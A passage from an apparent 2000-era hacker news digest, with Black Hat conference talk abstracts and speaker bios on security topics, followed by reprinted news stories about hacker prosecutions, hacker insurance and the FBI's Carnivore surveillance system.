      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
       
      Jeremy Rauch - UN*X Security Specialist, Security-Focus.com. 
      Dave Ahmad - UN*X Security Specialist, Security-Focus.com. 
      Routers, Switches & more: The glue that binds them all together. 
      
      By now, anyone with an inkling about security knows that they need to protect their 
      assets.  We've all heard we need a firewall, and we all know that we need to lock down 
      machines.  What about the glue that binds them all together?  The routers, switches, 
      network administration protocols, authentication protocols...what about that stuff?  
      This talk will go into the security flaws you don't even think about, realize are 
      there, or have dismissed as being inconsequential.  
      
      Jeremy Rauch has been involved in discovering and researching security vulnerabilities
      from a number of different perspectives.  Working with vendors, he has identified and 
      helped fix over two dozen major security vulnerabilities.  Jeremy is currently a developer
      at one of the largest security vendors, where part of his duties includes the identification 
      and reporting of security risks.  Jeremy is also one of the founders of Security Focus, Inc.,
      a centralized online security resource offering security news, products, events, books, 
      tools, and one of the most comprehensive vulnerability listings on the net. 
      
      Dave has been working with network and Unix security for a number of years and is a founding
      member of Security-Focus.com.  He has dealt with both general Unix auditing and intrusion 
      detection as well as secure software development.  Dave is the co-host of Info.Sec.Radio, a 
      radio show airing twice a month on both a Canadian radio station and the Internet via a 
      RealAudio stream.  
      
      Their Presentation!(PowerPoint 208k) 
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
       
      Marcus Ranum - CEO Network Flight Recorder. 
      Intrusion Detection and Network Forensics. 
      
      Marcus Ranum is CEO of Network Flight Recorder, Inc., and has been specializing in Internet
      security since he built the first commercial firewall product in 1989. He has acted as chief
      architect and implementor of several other notable security systems including the TIS firewall
      tool kit, TIS Gauntlet firewall, whitehouse.gov, and the Network Flight Recorder. Marcus 
      frequently lectures on Internet security issues, and is co-author of the "Web Site Security 
      Source book" with Avi Rubin and Dan Geer, published by John Wiley and sons. 
      
      Their Presentation! (PowerPoint 199k) (Long Version -PowerPoint 460k) 
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
       
      JD Glaser - CEO of NT Objectives. 
      Auditing NT -  
      
      This talk will be the third in a series to address the issue of auditing an NT box after a break-in.
      Specifically, we will extend our look under the hood to find places where altered files can hide as 
      well as examine the evidence left behind by an intruder. This talk will also cover a set of tools that
      can uncover various hidden aspects of NT's internal state. NT's built-in tools are not sufficient in 
      most cases for examining system state, so this talk includes a small tutorial on a suite of free tools
      I have made to aid Windows NT intrusion research. Details will include: 
      
      Examine NTFS file time stamping 
      Examine NT Drivers behavior 
      Examining permissions/file attributes 
      Examining COM security backdoors Part III 
      Looking for trojan behavior Part III 
      Finding backdoors in Windows NT

      JD Glaser is CEO of NT OBJECTives, Inc., a maker of security audit tools for Windows NT, most notably
      NTLast and Forensic Toolkit, which are free tools for the security community. He is an MCSE/MCSD who 
      specializes in contract DCOM programming and NT network security. Clients have included Intel, HP, 
      Columbia Sportswear and Tripwire. Latest projects have involved NTFS file system code for Tripwire for
      NT and file system filters for real-time detection systems for NT that bypass NT's untrusted API. 

      Their Presentation! (PowerPoint 101k) (Greg Hoglund - Caught! 175k .jpg) 
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
       
      Jennifer Granick - Attorney at Law. 
      International Legal issues surrounding computer hacking. 
      
      A global computer network poses special questions in computer crime prevention and punishment.  There is 
      no international consensus on what a computer crime is or what should be prohibited conduct.  Nor are there
      agreements on procedural matters such as transborder searches, data preservation, standard of proof or 
      jurisdiction.  This presentation will review the points of contention, discuss current efforts towards 
      obtaining consensus and highlight the benefits and detriments of international consensus to investigators 
      and civil libertarians alike. 
      
      Jennifer Stisa Granick is a defense lawyer practicing in the areas of high tech and computer crime from her 
      office in San Francisco.  She defends unauthorized access, trade secret theft, and email interception cases 
      nationally.  Granick has written articles on wiretapping, workplace privacy and trademark law for Wired.  
      Additionally, she has spoken at previous Black Hat Briefings and to NASA computer security professionals 
      about computer crime laws, digital forensics and evidence collection. 
      
      Their Presentation! (PowerPoint 53k) (Field Notes 38k .rtf) 
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
       
      Martin Khoo - Assistant Director, Incident Handling, SingCERT 
      Responding to Cyber Threats. 
      
      IT and the Internet are fast becoming important parts of our national competitiveness. With the emerging 
      globalization and worldwide connectivity, Internet security threats in other parts of the world can quickly
      translate into security issues that are potentially damaging to the local IT community. It is crucial for 
      Singapore to be able to respond efficiently and effectively to Internet computer incidents and security 
      breaches. It is important to have a localized CERT effort that offers security incident resolution services 
      in a timely and effective manner.  
      
      This talk will introduce the Singapore Computer Emergency Response Team (SingCERT) and cover the various 
      programmes and initiatives that SingCERT offers to its constituency. It will also touch on the experience and
      lessons learnt through the handling and resolution of security incidents and highlight some of the trends in 
      incidents reported to SingCERT.  
      
      Martin is an Assistant Director with the Infocomm Development Authority (IDA) of Singapore. He takes charge of 
      security incident management where he oversees a group of IT Security Consultants in providing security services 
      to the various government organizations. He is also the Programme Manager of the Singapore Computer Emergency 
      Response Team (SingCERT) which is the national level security incident response center charged with the prevention,
      detection and resolution of computer security incidents on the Internet and Singapore ONE. He manages a group of 
      Security Consultants providing incident resolution and security awareness promotion services to the local IT 
      industry and the general IT users. Martin is a frequent speaker on subjects regarding security and incident 
      handling. He last spoke at the PKI Conference on "Instilling Trust for Secure eCommerce" organized by 
      CommerceNet Singapore in October 1999. 
      
      Their Presentation! (PowerPoint 107k) 
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
       
      Pierre Noel - CEO of ICSA.net Asia Pacific 
      Internet Age: Why Security Architectures Fail (The Story of the Maginot Line Under Attack) 
      
      Why are so many companies, organizations and agencies regularly hacked? Some of these regularly hacked 
      organizations have however invested huge amounts in crafting their IT architectures.  Security products,
      both hardware and software, are available off-the-shelf. Some of them underwent strong security 
      certifications, and they are widely used in the Internet, even by the companies mentioned above. 
      
      So, what's wrong with the strategy? 
      
      In a 1998 survey on the 'barriers and inhibitors to eCommerce,' four out of the five most important 
      inhibitors were security-related; the same survey in '99 showed these security-related inhibitors 
      pushed back to rank 20 to 50! Does this mean that security is no longer an inhibitor to eCommerce? Or
      does this imply something else? 
      
      Prior to the Second World War, the French Army erected the Maginot Line to protect themselves against
      invasion. Pride of the nation, the Maginot line proved to be totally useless, and the invasion of France 
      took place at a very rapid pace. Can we possibly transpose this story to the IT world? 
      
      With a series of 'field' observations, Pierre will discuss the reasons for security weaknesses, and derive
      simple paths to reducing these exposures. 
      
      Pierre Noel is currently the CEO of ICSA.net Asia Pacific and the president and founder of Burton & Brooks
      International, a consulting firm specialized in IT security for large enterprises and governments. As 
      president of Burton & Brooks, Pierre is charged with the role of chief technical officer for the Hong Kong
      Post Public Key Infrastructure and Root Certification Authority project. 
      
      Previously, Pierre was first the director of security best practice, Asia for PLATINUM technology, before he
      was promoted to vice president for Security Consulting Worldwide after Computer Associates' acquisition of 
      PLATINUM.  Pierre has more than 10 years of experience in providing independent consultancy worldwide. He 
      specialized in the fields of Enterprise Security and large scale mission critical OLTP systems. Pierre was 
      chief consultant and architect at the Open Software Foundation, then known as The Open Group. 
      
      Their Presentation! (PowerPoint 1,118k) 
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
       
      Wilfred Adrian Nathan - Head, Computer Forensics Branch, CID Singapore. 
      Computer Crime: The law enforcement perspective with case studies. 
        
      
      Their Presentation! (PowerPoint 497k) 
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
       
      Joey__ (a.k.a Nishad Herath) - CTO of SecureSolv.com. 
      Advanced Windows NT Security. 
      
      In his talk, he will walk you through the exploitation of an unpublished real world Windows NT based buffer
      overflow exploit as an example, discussing the following: 
      
      * A reverse engineering approach to Windows NT software security exploration. How advanced tools like IDA 
      and SoftICE can be utilised to analyze software and OS for vulnerabilities. (Who cares about source!) 
      * Advanced Win32 shellcode techniques and how the most protected systems can be broken with innovative 
      shellcode (including shellcode techniques unpublished to date). 
      * Shellcode considerations specific to Windows NT (including issues unpublished to date). 
      * Protection from exploitation! Discussion of innovative new buffer overflow prevention technology and 
      advanced backdooring prevention for Windows NT. 
      
      Joey__ is the CTO of SecureSolv.com, Sri Lanka's pioneering IT security consultancy firm specializing in
      IT security for e-Businesses, advanced security research, auditing, reverse-engineering services as well
      as technical consultancy for security products and services.  With more than 6 years of experience in the
      industry, Joey__ specializes in Windows NT / Windows 2000 kernel architecture, security, system internals
      exploration, exploitation and intrusion protection techniques. His early work includes publishing the internal
      workings of the Windows NT Native Call Interface, which was undocumented at the time. 
      SPEAKERS 
      There were be approximately 14 speakers over two days, including 
      a moderated panel discussion. 
      
      5/02/00 Presentation materials now on-line. A/V is encoding this week. 
      
      The goal of the talks are to inform the audience with quality current state system vulnerabilities and fixes 
      as well as future areas of concern.  We cover a broad range of security issues from the perspective of the 
      network administrator, system cracker, and IS managers.  Because our unique speakers The Black Hat Briefings 
      will offer the audience a deep insight into the real security issues facing your network with no vendor pitches!
       
      
      
      --------------------------------------------------------------------------------
      
      Greg Hoglund - Rootkit.com 
      Advanced Buffer Overflow Techniques 
      
      This is a technical talk aimed at people who have already been exposed to buffer overflows and want to learn 
      more.  The talk assumes the audience has at least some knowledge of CPU's and Processes.  For those of you who
      already understand buffer overflows, this talk will be a refreshing discourse on technique.  We will show how 
      the injection method can be decoupled from the payload.  We then explore the details and challenges of  injecting
      code into a remote process.  We will also explore the payload, the encoding methods, and how to dynamically load 
      new functions.  Lastly, we discuss the possible effects of a payload, including network worms, virus, and rootkits.  
      
      Greg Hoglund is a software engineer and researcher.  His most notable achievement was the creation of the Asmodeus
      Security Scanner, a Windows NT based port scanner and ethernet sniffer, which he later sold to Webtrends, Corp.  
      Additionally, Hoglund has written several white papers on content based attacks, kernel patching, and forensics. 
      He currently works as a researcher for Tripwire Security Systems, exploring forensics issues. 
      
      Their Presentation!(PowerPoint 247k) 
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
       
      Batz -  Independent Security Researcher. 
      Casing the Joint.  What we already know about your network.  
      
      An overview of what an attacker already knows about your network.  The information is described using an ASN.1 
      template for possible integration into autonomous agents, conspicuously similar to the ones described in Caezars 
      presentation.  
      
      Batz is an independent security researcher and Evil Super Villain who caused a stir last year by bringing to light
      some serious concerns with BGP4 configuration and implementation at Blackhat Briefings 99 in Las Vegas Nevada.  
      
      Their Presentation!(PowerPoint 86k) 
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
       
      Mudge - VP of R&D for @Stake. 
      An analysis of tactics used in discovering "passive" monitoring devices. 
      
      Formerly CEO and Chief Scientist at renowned "hacker think tank", the 
      L0pht, Mudge is considered one of the nations leading "grey-hat hackers". 
      He, along with the other members of the L0pht, are now heading up @Stake's 
      research labs ensuring that the company is at the cutting edge of Internet 
      security. 

      Mudge is a widely sought after keynote speaker in various forums, 
      including analysis of electronic threats to national       security. He 
      has been called to testify before the Senate Committee on Governmental 
      Affairs, has briefed a wide range of members of Congress and has conducted 
      training courses for the Department of Justice, NASA, the US Air Force, 
      and other governmental agencies. 

      A recognized name in crytpanalysis, Mudge has co-authored papers with 
      Bruce Schneier that were published in the 5th       ACM Conference on 
      Computer and Communications Security, and the Secure Networking - CQRE 
      International Exhibition and Congress. 

      He is the original author of L0phtCrack the award winning NT password 
      auditing tool. In addition, Mudge co-authored       Anti-Sniff, the 
      world's first commercial remote promiscuous mode detection program. He has 
      written over a dozen advisories and various tools -- many of which 
      resulted in numerous CERT advisories, vendor updates, and patches.
       
      
      --------------------------------------------------------------------------------
       
      Caezar -  
      Malicious Information Gathering 
      
      As in physical surveillance, information can be gathered about a target 
      network without penetrating its security perimeter.  Using computer virus 
      and worm techniques to surround the target, an opponent can monitor and 
      collect web and e-mail traffic.  Critical business communications could be 
      altered in transit or halted altogether.  
      This discussion will cover independent autonomous agents, information filtering
      and malicious code propagation. 
      
      Their Presentation!(PowerPoint 92k) 
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
       
      Jeremy Rauch - UN*X Security Specialist, Security-Focus.com. 
      Dave Ahmad -UN*X Security Specialist, Security-Focus.com. 
      Routers, Switches & more: The glue that binds them all together. 
      
      By now, anyone with an inkling about security knows that they need to 
      protect their assets.  We've all heard we need a firewall, and we all know 
      that we need to lock down machines.  What about the glue that binds them 
      all together?  The routers, switches, network administration protocols, 
      authentication protocols...what about that stuff?  This talk will go in to 
      the security flaws you don't even think about, realize are there, or have 
      dismissed as being inconsequential.  

      Jeremy Rauch has been involved in discovering and researching security 
      vulnerabilities from a number of different       perspectives.  Working 
      with vendors, he has identified and helped fix over two dozen major 
      security vulnerabilities. Jeremy is currently a developer at one of the 
      largest security vendors, where part of his duties include the 
      identification and reporting of security risks.  Jeremy is also one of the 
      founders of Security Focus, Inc., a centralized online security resource 
      offering security news, products, events, books, tools, and one of the 
      most comprehensive vulnerability listings on the net. 

      Dave has been working with network and Unix security for a number of years 
      and is a founding member of Security-Focus.com.  He has dealt with 
      both general Unix auditing and intrusion detection as well as secure 
      software development.  Dave is the co-host of Info.Sec.Radio, a radio show 
      airing twice a month on both a Canadian radio station and the Internet 
      via a RealAudio stream.  
      
      Their Presentation!(PowerPoint 208k) 
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
       
      Marcus Ranum - CEO Network Flight Recorder. 
      Intrusion Detection and Network Forensics. 
      
      Marcus Ranum is CEO of Network Flight Recorder, Inc., and has been 
      specializing in Internet security since he built the first commercial 
      firewall product in 1989. He has acted as chief architect and implementor 
      of several other notable security systems including the TIS firewall tool 
      kit, TIS Gauntlet firewall, whitehouse.gov, and the Network Flight 
      Recorder. Marcus frequently lectures on Internet security issues, and is 
      co-author of the "Web Site Security Source book" with Avi Rubin and Dan 
      Geer, published by John Wiley and Sons. 

      Their Presentation! (PowerPoint 199k) (Long Version -PowerPoint 460k)       
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
       
      JD Glaser - CEO of NT Objectives. Auditing NT -  

      This talk will be the third in a series to address the issue of auditing 
      an NT box after a break in. Specifically, we will extend our look under 
      the hood to find places where altered files can hide as well as examine 
      the evidence left behind by an intruder. This talk will also cover a set 
      of tools that can uncover various hidden aspects of NT's Internal state. 
      NT's built in tools are not sufficient in most cases for examining system 
      state, so this talk includes a small tutorial on a suite of free tools I 
      have made to aid Windows NT intrusion research. Details will 
      include: 
      
      Examine NTFS file time stamping 
      Examine NT Drivers behavior 
      Examining permissions/file attributes 
      Examining COM security backdoors Part III 
      Looking for trojan behavior Part III 
      Finding backdoors in Windows NT
      
      JD Glaser is CEO of NT OBJECTives, Inc., a maker of security audit tools 
      for Windows NT. Most notably, NTLast and Forensic Toolkit, which are free
      tools for the security community. He is an MCSE/MCSD that specializes in 
      contract DCOM programming and NT network security. Clients have included
      Intel, HP, Columbia Sportswear and Tripwire. Latest projects have involved
      NTFS file system code for Tripwire for NT and file system filters for 
      real-time detection systems for NT that bypass NT's untrusted API. 

      Their Presentation! (PowerPoint 101k) (Greg Hoglund - Caught! 175k .jpg) 
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
       
      Jennifer Granick - Attorney at Law. 
      International Legal issues surrounding computer hacking. 
      
      A global computer network poses special questions in computer crime 
      prevention and punishment.  There is no international consensus on what a 
      computer crime is or what should be prohibited conduct.  Nor are there 
      agreements on procedural matters such as transborder searches, data 
      preservation, standard of proof or jurisdiction.  This presentation will 
      review the points of contention, discuss current efforts towards obtaining 
      consensus and highlight the benefits and detriments of international 
      consensus to investigators and civil libertarians alike. 

      Jennifer Stisa Granick is a defense lawyer practicing in the areas of high 
      tech and computer crime from her office in San Francisco.  She defends 
      unauthorized access, trade secret theft, and email interception cases 
      nationally.  Granick has written articles on wiretapping, workplace 
      privacy and trademark law for Wired.  Additionally, she has spoken at 
      previous Black Hat Briefings and to NASA computer security professionals 
      about computer crime laws, digital forensics and evidence collection. 

      Their Presentation! (PowerPoint 53k) (Field Notes 38k .rtf) 
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
       
      Martin Khoo - Assistant Director, Incident Handling, SingCERT 
      Responding to Cyber Threats. 
      
      IT and the Internet are fast becoming important parts of our national 
      competitiveness. With the emerging globalization and worldwide 
      connectivity, Internet security threats in other parts of the world can 
      quickly translate into security issues that are potentially damaging to 
      the local IT community. It is crucial for Singapore to be able to respond 
      efficiently and effectively to Internet computer incidents and security 
      breaches. It is important to have a localized CERT effort that offers 
      security incident resolution services in a timely and effective manner.  

      This talk will introduce the Singapore Computer Emergency Response Team 
      (SingCERT) and cover the various programmes and initiatives that SingCERT 
      offers to its constituency. It will also touch on the experience and 
      lessons learnt through the handling and resolution of security incidents 
      and highlight some of the trends in incidents reported to SingCERT.  

      Martin is an Assistant Director with the Infocomm Development Authority 
      (IDA) of Singapore. He takes charge of security incident management where 
      he oversees a group of IT Security Consultants in providing security 
      services to the various government organizations. He is also the Programme 
      Manager of the Singapore Computer Emergency Response Team (SingCERT) which 
      is the national level security incident response center charged with the 
      prevention, detection and resolution of computer security incidents on the 
      Internet and Singapore ONE. He manages a group of Security Consultants 
      providing incident resolution and security awareness promotion services to 
      the local IT industry and the general IT users. Martin is a frequent 
      speaker on subjects regarding security and incident handling. He last 
      spoke at the PKI Conference on "Instilling Trust for Secure eCommerce" 
      organized by CommerceNet Singapore in October 1999. 
      
      Their Presentation! (PowerPoint 107k) 
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
       
      Pierre Noel - CEO of ICSA.net Asia Pacific 
      Internet Age: Why Security Architectures Fail (The Story of the Maginot Line Under Attack) 
      
      Why are so many companies, organizations and agencies regularly hacked? 
      Some of these regularly hacked organizations have however invested huge 
      amounts in crafting their IT architectures.  Security products, both 
      hardware and software, are available off-the-shelf. Some of them underwent 
      strong security certifications, and they are widely used in the Internet, 
      even by the companies mentioned above. 

      So, what's wrong with the strategy? 

      In a 1998 survey on the 'barriers and inhibitors to eCommerce,' four out 
      of the five most important inhibitors were security-related; the same 
      survey in '99 showed these security-related inhibitors pushed back to rank 
      20 to 50! Does this mean that security is no longer an inhibitor to 
      eCommerce? Or does this imply something else? 

      Prior to the Second World War, the French Army erected the Maginot Line to 
      protect themselves against invasion. Pride of the nation, the Maginot 
      line proved to be totally useless, and the invasion of France took place 
      at a very rapid pace. Can we possibly transpose this story to the IT 
      world? 

      With a series of 'field' observations, Pierre will discuss the reasons for 
      security weaknesses, and derive simple paths to reducing these exposures. 

      Pierre Noel is currently the CEO of ICSA.net Asia Pacific and the 
      president and founder of Burton & Brooks International, a consulting firm 
      specialized in IT security for large enterprises and governments. As 
      president of Burton & Brooks, Pierre is charged with the role of chief 
      technical officer for the Hong Kong Post Public Key Infrastructure and 
      Root Certification Authority project. 

      Previously, Pierre was first the director of security best practice, Asia 
      for PLATINUM technology, before he was promoted to vice president for 
      Security Consulting Worldwide after Computer Associates' acquisition of 
      PLATINUM.  Pierre has more than 10 years of experience in providing 
      independent consultancy worldwide. He specialized in the fields of 
      Enterprise Security and large scale mission critical OLTP systems. Pierre 
      was chief consultant and architect at the Open Software Foundation, then 
      known as The Open Group. 
      
      Their Presentation! (PowerPoint 1,118k) 
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
       
      Wilfred Adrian Nathan - Head, Computer Forensics Branch, CID Singapore. 
      Computer Crime: The law enforcement perspective with case studies. 
        
      
      Their Presentation! (PowerPoint 497k) 
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
      
      @HWA


289.0 [IND] FBI Investigating Qualcomm Hacker
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      http://www.infowar.com/hacker/00/hack_070800a_j.shtml
      
      7/05/00
      FBI Investigating Qualcomm Hacker
      By Staff, Newsbytes
      WASHINGTON, D.C., U.S.A.,
      07 Jul 2000, 2:53 PM CST
      
      The FBI is investigating a University of Wisconsin student as a possible 
      suspect in a series of hacker attacks against wireless provider Qualcomm, 
      according to a San Diego Union-Tribune story today.

      The FBI has accused a University of Wisconsin graduate student of hacking 
      into San Diego-based Qualcomm's computer networks, replacing files and 
      installing "back doors," which allowed him to re-enter the system from a 
      number of points on the network, the story reports.

      According to documents filed in San Diego federal court, the intrusions 
      pierced Qualcomm's firewalls and network security, and jeopardized a 
      number of the company's crucial servers that contain proprietary 
      information.

      The story also reports that investigators learned the student broke into 
      computer networks operated by three other companies, including NetOptions, 
      a Los Angeles-based Internet service provider; CISNet of Youngstown, Ohio; 
      and the TeX Users Group, an organization based in Massachusetts for those 
      interested in text typesetting and font design.

      The FBI declined to comment on the case, and Qualcomm officials did not 
      return calls seeking comment. 
      
      @HWA

290.0 [IND] Lloyd's Offers Hacker Insurance
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.infowar.com/hacker/00/hack_071000a_j.shtml      
      
      7/10/00
      Lloyd's Offers Hacker Insurance
      By The Associated Press
      Special to CNET News.com
      July 9, 2000, 11:30 p.m. PT
      
      http://news.cnet.com/news/0-1005-200-2232221.html 
      
      Lloyd's of London will offer up to $100 million in insurance coverage to 
      clients of computer-security management firm Counterpane Internet Security 
      against hacker-related losses to its business or its customers. 

      San Jose, Calif.-based Counterpane in its announcement today claimed to be 
      the first Internet-security service provider to offer a guarantee of 
      direct financial reimbursement in the event a hacker breaks through its 
      defenses and uses customer data. The guarantee is underwritten by 
      insurance brokers Frank Crystal & Co. and SafeOnline, with additional 
      coverage available for purchase from Lloyd's. 

       
      "This is not for your home user; this is for Yahoo, this is for CD 
      Universe, which lost all those credit card numbers (to a hacker) in 
      January," said Bruce Schneier, chief technology officer at Counterpane. 
      "It's threat avoidance. This, along with monitoring, is just another arrow 
      in your quiver." 

      Standard computer security includes firewalls, antivirus software that is 
      updated weekly, and systems that can prevent the entry of hackers. But 
      experts say much of that software contains weaknesses that can be 
      exploited by enterprising hackers. 

      An FBI-funded report in March suggested an epidemic of computer crime is 
      under way across the United States, based on 643 responses, mainly from 
      large companies and government agencies. Since March 1999, nine out of 10 
      organizations reported computer security breaches, according to the annual 
      Internet crime survey by the FBI and the San Francisco-based Computer 
      Security Institute. 

      The most common forms of unauthorized computer intrusions are viruses, 
      stolen laptop computers and employees abusing their Internet privileges. 
      But businesses increasingly are reporting more serious incidents, 
      including system penetration from the outside, financial fraud, data 
      network sabotage or denial-of-service attacks--a deluge of repetitive 
      requests sent to clog a Web site's computers until they seize up. 

      Various organizations have estimated that hacker attacks this year have 
      cost businesses tens of billions of dollars, mostly in lost time. A study 
      released last week by Jericho, N.Y.-based Reality Research estimated 
      businesses worldwide will lose more than $1.5 trillion this year because 
      of computer viruses spread through the Internet. 

      The "I Love You" virus, spread via email earlier this year, affected 
      about 45 million computer files at a cost to companies of $2.61 billion 
      alone, according to Computer Economics. 

      Counterpane's Schneier said a $20,000 annual premium will provide coverage 
      for $1 million in hacker losses; the cost rises to $75,000 for $10 million 
      in losses. The price of any additional coverage, up to $100 million, must 
      be negotiated with Lloyd's. 

      Some regular insurance policies pay hacker losses under loss-of-business 
      or act-of-vandalism clauses, but there are few policies written to 
      specifically cover hacker attacks. And those that do often carry premiums 
      that start at $100,000 and run up to $3 million. 

      Analysts say the hacker insurance market is expected to grow to billions 
      of dollars in annual premiums by the end of the decade, reflecting the 
      growing popularity of e-commerce. But insurers have been reluctant to be 
      the groundbreakers because there are no effective tools for measuring the 
      risk. 

      Insuretrust.com also assesses security risks but provides protection only 
      for what it calls "residual risks." 

      IBM and insurance broker Sedgwick Group provide products ranging from 
      security reviews to compensation for lawsuits brought by victims of online 
      credit card fraud. And International Computer Security Association, an 
      Internet security company, announced in 1998 that it will pay corporations 
      up to $250,000 if hackers successfully crack its computer system. 

      Copyright 2000 Associated Press. All rights reserved. This material may 
      not be published, broadcast, rewritten, or redistributed. 
      
      
      
      @HWA
      
291.0 [MM] Man charged with breaking into NASA computers
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      July 12 2000
      
      Source: MSNBC
      Submitted by: Spikeman
      
      http://www.msnbc.com/news/432167.asp?0nm=O11R

      Man charged with breaking into NASA computers

      WHITE PLAINS, N.Y., July 12 -- Federal authorities
      today arrested an alleged hacker who they say
      broke into NASA computers in 1998 and used one
      to host a chat room for other hackers.
      
      Mary Jo White, the U.S. attorney for the
      Southern District of New York, indicted Raymond Torricelli, 20, aka rolex,
      on five felony counts for credit card fraud, interception and unauthorized
      access to two National Aeronautics and Space Administration computers. 
      
      White alleged in court documents that Torricelli broke
      into two computers at the agency's Jet Propulsion Laboratory (JPL). 

      Prosecutors allege the hackers, part of a group called #conflict, chatted
      about hacking, cracking, credit card fraud and how to use their computers to
      alter the results of the annual MTV Movie Awards, White said in a statement. 
                                
      CODES DECRYPTED

      Torricelli allegedly used the other JPL computer to place a 
      sniffer program to intercept computer user names and passwords on networks. 
      
      Prosecutors said they discovered 76,000 such passwords on Torricelli's home 
      computer, many of which had been decrypted. 
                                
      Torricelli allegedly also cracked 800 other computers in his online sneaking
      spree. 

      Conviction on the credit card fraud and password possession charges could 
      lead to 10 years in jail and a $250,000 fine. The password interception charge
      carries a possible five-year term and $250,000 fine, and the two charges for 
      computer intrusion are punishable by a year in jail for each count. 
                                
      WENT HOME TO MOM 
    
      Torricelli's court-appointed attorney, Suzanne Brody of Federal Legal Aid,
      said she had not yet had a chance to discuss the case in depth with her client. 
      She said his computers were seized two years ago following the alleged activity,
      but Torricelli was not arrested then.       
     
      Before being released on $50,000 bond today, Torricelli was understandably
      frightened by the experience of being arrested by federal authorities, Brody said. 
              
      "We got him bailed out, and he went home to his mother," Brody said.  
      Torricelli is from New Rochelle. Last December, another New Rochelle teenager was
      sentenced for hacking America Online's computer system after gaining knowledge of
      the Internet service provider working as a technical support volunteer for the 
      company.
                                
      @HWA  

292.0 [MM] The FBI's Carnivore(s) Initiative (More big brother)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      MSNBC
      http://www.msnbc.com/news/432143.asp  
      Forget the FBI's snooping -- What about your boss?
      By Lisa Napoli
      MSNBC

      July 12 -- Lots of people have their knickers in a
      knot over this unfortunately named surveillance
      program the FBI is using called "Carnivore."
      (Sounds like a sequel to Survivor, but in actuality,
      it's a sniffer that tracks the e-mail of criminal
      suspects.) The notion of the FBI forcing an
      Internet Service Provider to check out the e-mail
      of some bad guy isn't such a terrible idea, on the
      face of it, though it certainly isn't as sexy as a
      high-speed chase or something out of Shaft.
      Remember, folks, though it's easy to forget: Law
      enforcement is actually good for society, and
      technology can aid and abet in the quest for law
      and order.
      
      BUT IT'S THE opportunity for screw-ups, and abuse,
      that has the American Civil Liberties Union, among others,
      concerned. Marc Rotenberg of the Electronic Privacy
      Information Center summed it up nicely: "It goes to the heart
      of how the Fourth Amendment and the federal wiretap
      statute are going to be applied in the Internet age."

      Of course, there is the possibility that the FBI would
      inadvertently read your mail in addition to that of the
      suspects, and not only violate your privacy, but perhaps get
      you into trouble as well. (Two-for-one?) For that very reason,
      the infamous and ground-breaking Dutch ISP, XS4ALL,
      refused to comply with its governmental authorities three
      years ago when they asked to tap into one of their customers.
      Since then, the Dutch government has passed a shiny new
      telecommunications law that would give them the power to
      conduct such a digital wiretap. 

      Here in the United States, we have the Electronic
      Communication Privacy Act, a 1986 law that is being
      interpreted by the government as allowing digital wiretaps
      using software like Carnivore.

      And while all that is interesting, what everyone seems to
      be forgetting is that your boss is more likely to be reading
      your e-mail than the FBI. 

      This study from the latest American Management Association 
      Monitoring and Surveillance study. "Nearly three quarters of major
      US firms record and review
      employee communications and activities on the job, including
      their phone calls, e-mail, Internet connections, and computer
      files," the group reports. That's twice what the AMA found
      in 1997, when the survey was first conducted. 

      One of the most infamous users of blocking software in
      the workplace is Bloomberg, the financial news service.
      Starting in June 1999, Bloomberg started scanning outgoing
      e-mail on the service for words that the company considered
      racist, profane, or offensive. When the policy was first
      instituted, cheeky employees kept testing the waters to see
      which words would make it through.

      But just because your workplace mail isn't scanned
      doesn't mean someone isn't watching. Stories about software
      that monitors your surfing activity -- to see if you're wasting
      time on the clock -- are common. And keep in mind: Your
      superiors may start watching you if they suspect a problem.
      Case in point: The New York Times Co. says it doesn't
      routinely scan e-mail, unless there have been complaints. And
      last year, complaints about racy e-mails circulating led to the
      firing of 23 people at an administrative facility in Virginia. 

      The potentially thorny privacy issues raised by Carnivore
      are an issue, to be sure, but what you say and how you surf
      at work might get you into more trouble, more immediately.
      Have you had an experience where your e-mail activity at
      work has been monitored? I'd love to hear from you.
                                 
      @HWA                                       
      

293.0 [IND] Forbidden Knowledge calls it quits.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.mdma.za.net/fk
      http://www.mdma.za.net/fk-farewell.txt
      
      +--==--++--==--++--==--++--==--++--==--++--==--++--==--++--==--++--==--++--==+
      (          F  0  R  B  1  D  D  3  N      K  N  0  W  L  3  D  G  3          )
